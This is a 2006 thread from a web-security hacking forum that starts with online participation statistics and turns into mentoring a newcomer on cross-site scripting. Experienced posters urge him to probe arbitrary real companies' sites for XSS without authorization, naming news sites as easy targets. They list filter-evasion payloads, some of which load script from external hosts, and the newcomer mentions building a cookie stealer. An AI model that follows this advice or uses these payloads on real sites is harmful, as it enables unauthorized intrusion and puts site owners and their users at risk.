Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Lurkers - we know who you are
Posted by: rsnake
Date: October 11, 2006 11:57AM

Jakob Nielsen has a short article on online communities that’s worth a read.

http://www.useit.com/alertbox/participation_inequality.html

This stat seems to jive pretty well with what I see in the logs too. About 1/10 are actually registered users and of those registered users there are only 1/10 are consistant posters. It's easier to measure on the blogs - I have somewhere north of 500 readers (hard to estimate precicely) and maybe 20 people who comment regularly (making it 95-4-1% distribution). Interesting stats for anyone working with blogs/forums.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 11, 2006 11:58AM

Actually, the side effect for this board in particular is that with more dynamic pages out there for people to post and contribute to the more CSRF and XSS will prevail, as their major recommendation is to build more dynamic sites with lower hurdles/adoption and higher customization benefits.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: Kyran
Date: October 11, 2006 12:08PM

Interesting. It's a shame lurkers isn't spelled with a c also.
lur.ckers.org

- Kyran

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 11, 2006 01:07PM

Hahah, indeed! lur-minus-the-c.ckers.org

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 11, 2006 03:25PM

I'm guilty of lurking... with gusto!!...

Actually, I've just got so much to read and learn I figured I would get a *small* handle on it before I flood ya with questions.... haha

I've been reading the cheatsheet and testing on my own sites, I just finished up a cookie stealer from WhiteAcids tut's yesterday.... It works, to a point, I cant get any valid cookies to go through though.... (I had one from myself and I cant seem to get it to reproduce again)

much, MUCH more reading to do...

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 11, 2006 04:01PM

pheusion, hahah, I feel your pain as we've all been there at some point, but without "newbish" questions there's really no way to know how to get you all up to speed. So although it might be a big step back for some of the folks, it doesn't hurt to have the questions asked as it helps document the thinking that all of us have to go through at some point to get to where we are now. So feel free to ask any/all questions you want - if nothing else you might get a "STFU RTFM @ URL:..." (although I haven't seen anyone do that yet). But even still it may save you some time looking for the answer yourself.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 06:44AM

As always Snake, you remind me of why I love this site so much.

The newb questions will come soon, everyday I am learning something new and researching, which is honestly, 99% of the fun...

Loving the study, makes me feel smart haha

Side note:
trying to find this post about someone saying they want to kick some A$$.... Whats the background about that? I've got a MMA / BJJ school I help run if ever in need.. Don't mess with Snake or ID (Or acid or Maluc or......) lol



Edited 1 time(s). Last edit at 10/12/2006 06:59AM by pheusion.

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 07:12AM

Ok, here's a question...

I'm not a coder, I dont have a difficult time in keeping up with simple code, but obviously at the moment I do not have the knowledge to code out a "XSS sandbox" type site myself.... Think Perl and *Nix, thats pretty much my level of coding knowledge... simple admin type stuff (Simple scripts to do this or that)

With that being the case, I am sure the right answer is to go and learn how to code out my own site... RTFM right hahaha

In the in-between, I have been testing against some of my own servers, which comprise of Joomla (Mixed Martial Arts Site). I know alot of issues are found in Joomla, mainly due to developers creating modules that incorporate into the main system, and not working with the original developers. I was wondering if there is something that will provide me with a full testing environment, that I can load onto my own domain.

Most of the time I am researching and teaching myself from work (12 hour days suck) so I cant just go running around the net and testing against others sites, even with a proxy I just dont want to use the co network for my testing and risk the possibility of someone getting pissed....

Would it be as simple as installing a known vuln version of like PHPBB or similiar? Anything you can recommend?

I have been playing with alot of the framworks, but it's just not the same.

Can ya say long winded? Sorry...

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: maluc
Date: October 12, 2006 08:26AM

lol, thanks for the offer of thug support.. ^^
and i assume he's referring to some dude named Tyson .. scroll to bottom of http://ha.ckers.org/wallofshame.html

And installing some web app just to locate XSS is alot of work for little gain. You'll learn alot more by just trying to find some on different random websites. Now, if you want to test writing actual exploits, like cookie stealer, form stealer, key logger, SQL injection, file inclusion, etc .. then yes. You should definitely test exploiting locally - atleast those last two. I used Invision Power Board v1.3 myself, which worked well. It has several holes of each flavor, and helped me learn SQL's syntax much better.

For reflected XSS though, i'd just stick to online sites. And once you get comfortable with both html and javascript injection (javascript is slightly tougher to learn) then skim through that Full Disclosure thread and look at the one's people say "This is an interesting example" for.

-maluc

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 08:55AM

Thanks for the info Maluc...

I think maybe that was my issue, finding the sites initially... Doing a google search for various patterns or login file types seemed like it was producing results, but I became weary actually trying to inject based off of the cheatsheet.... It seemed like those would be the hardes hit (As every newb such as myself is following the same learning pattern, I would imagine those sites are getting tired of seeing their logs...) I thought about going to like the 30th result page and starting from there, but I still had some second thoughts about doing it from here (work).... Unfortunately I am here just about every wakeing moment (Hence the need to learn more and move on)

I suppose if I am proxied and I am not altering anything I am not doing anything wrong really, and I could say it is related to work as we are implementing a new web order systems....

IPB for the SQL injections should be good though, I have been using the hacme, mightyseek and other type of sites... The IPB will allow me to test and use it on my own without worry... Sweet...

Thanks again, really appreciate it...

(Ahh, I see the A$$ kickin statement... funny stuff...)



Edited 1 time(s). Last edit at 10/12/2006 08:59AM by pheusion.

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: maluc
Date: October 12, 2006 09:37AM

heh, there's no need to google at all.. just pick a company. any company. chances are (around 90-95% of large companies) it's gunna have a hole somewhere.

First places i check: Search box, Contact us form, feed back form, ForgotPassword form, newsletter signup, new account registration .. then all the extra variables in the links .. then anything and everything.

But ya, i never use a google search to find vulnerabilities (except redirects) .. but i do use it since i'm running out of sites to check. Pick an industry like "phone companies" and go down the list.

And yes, you shouldn't need the cheatsheet for most of them, except when there's unusual filters.

most common cheats i use:
String.fromCharCode              .. when ' -> \' and " to \"
style="-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss');xx:expression(alert())"
                                 .. when no > or < allowed
<script src=http://blah/xss.js?  .. when it deletes from  < to >
<script/xss>                     .. for <script> filter
<body onload=alert()>            .. for <scri* filter

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 09:56AM

Wow, Maluc I believe I owe you some beers =)

It's this type of info right here, real world type of examples that makes this site so valuable. So many other sites are willing to tell certain things, but not like you guys...

I would have been using Google and going through results for ages. Picking an industry is an EXCELLENT suggestion and something I can set a goal with.

I can't thank ya enough...

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: maluc
Date: October 12, 2006 10:09AM

lol, i'm not much of a beer man (too diluted, with piss).. but i'm not one to turn down good liquor.

and yeah, so far i've yet to see much noob bashing/ignoring here.. which is nice, but i can't guarantee that'll last.

by the way, don't start with telephone companies.. a few of those were pretty tough. News sites on the other hand, i've yet to see one that had even decent prevention. They might be the best choice, or just sites you frequent.

Note: news aggregators like slashdot/digg i didn't find any on

-maluc

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 10:23AM

Not a fan of beer myself (Bad for Training) So i'm on the same boat... Good liquor...

Honestly, I was thinking the UFC (MMA / NHB / BJJ) arena, alot of Mambo / Joomla sites, usually set up with little tech knowledge, its an arena I am active in, etc...

This place doesnt seem like bashing would become prevelant, all of you with knowledge on the subject are more than willing to give suggestions, and dont respond with RTFM or RTFA....

I mean, if people come in and say "What is XSS and can you show me howto hack my friends myspace account. Well, bash away... But it seems that if someone posts an intelligent valid question then it returns a intelligent valid response.

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 12, 2006 10:47AM

I'm sorry I didn't get a chance to respond during this conversation but to add my two cents... maluc is actually very correct, I VERY rarely use my own Cheat Sheet for actual testing unless I know for a fact that nothing normal will work and I need to test some of the more obscure vectors with bizzare syntax. That probably happens about 1/100 times or less. The most common ones are the ones Maluc listed above + some of the flash + expect stuff. To do that testing just change out victim.com with the site you want to test (and try this in IE): http://ha.ckers.org/expect.swf?http://www.victim.com/

But anyway, while I'm not going to tell anyone to STFU/RTFM myself, I can definitely see it happening. I figure we should all lead by example and not let it degrade into that. Any questions are fair. But one of the ways I learned was to intentionally build a flawed filtering mechanism and then fix it and then try to break it again and then fix that flaw and so on. I was going to release it but of course it has lots of XSS holes in it and the code sucked so it wasn't something I really wanted to release. But it did help my understanding a lot to set up my own internal webserver and hack it for dozens of hours a week for a few years straight.

And lastly, you definitely fit in the demographic by your interest in MMA. I was actually asked by a splinter group of the Lion's Den to join them (about 6-7 years ago when they were still on top), but I decided I liked the way my face looked, and I had stopped taking Ju Jitsu and Karate a few years earlier so I was a tad out of practice. For your martial arts fans, I only have one video from around that time - several years after I had stopped (this was probably 5-6 years ago that the video was taken): http://www.shocking.com/~rsnake/chucks.wmv -sorry for the funky format, but it does play under media player if you save it.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: Kyran
Date: October 12, 2006 11:19AM

Ah yes. I definetely agree we should try to not let this forum degrade into many other tech forums. RTFM should never be a response. Perhaps part of one. ( You should try doing this, btw also rtfm) but not the entire response.

I only use the cheat sheet as a quick encoding tool, since I am too lazy to make an Opera widget for it. Recently, I've only used it's vectors once ( The nexopia one. I had a brain fart and forgot the img src vector. http://www.nexopia.com/wiki/Advertise%3CIMG%20SRC=javascript:alert('xss')%3E ). I'm rather glad. I used to be totally dependant on it. Now I do all testing by hand.

I suppose you were right about people in security often taking martial arts rsnake. :D

- Kyran

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 11:26AM

NICE Snake... Always good to meet a fellow Tech / BJJ'er....

As you stated, the best way to learn is to build and break it... Getting HTTPD running isnt an issue for me... I just need to read up on building web apps and go the route you suggested...

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 12, 2006 11:50AM

hahah... I was probably in the flighweight class (maybe 150lbs in that movie). It was fun, but I actually was beating my teacher about 50% of the time so I dropped out of it. I'm a lover not a fighter. At least that's what I like to tell the ladies.

Yah, don't focus too much on making a robust real application. A form submission box, a filter and a response are all you need to start testing. I did all my stuff in perl (still do for the most part) because it's super fast to prototype with and I like the control it has over headers better than PHP (at least how it works). But it's probably better to use PHP long term since it's easily taken over as the dominant open source web application development programming language.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: id
Date: October 12, 2006 12:07PM

Will you freakin n00bs talk about this in the right forum?

-id

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 12, 2006 12:15PM

Is there a forum for mixed martial arts/intro to XSS?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: pheusion
Date: October 12, 2006 12:41PM

Lol...

Sorry

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: id
Date: October 12, 2006 01:09PM

Should I add the forum:

My ekarate > your xssfu
Post here if you want to kick someones ass that made you look like an ass via XSS!

-id

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: Kyran
Date: October 12, 2006 01:18PM

Hah. xssfu. I love it.

- Kyran

Options: ReplyQuote
Re: Lurkers - we know who you are
Posted by: rsnake
Date: October 12, 2006 01:45PM

That's tricky because generally I make myself look like an ass via XSS (reflected XSS). Does that make me an XSS-foo or does that give me XSS-fu?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.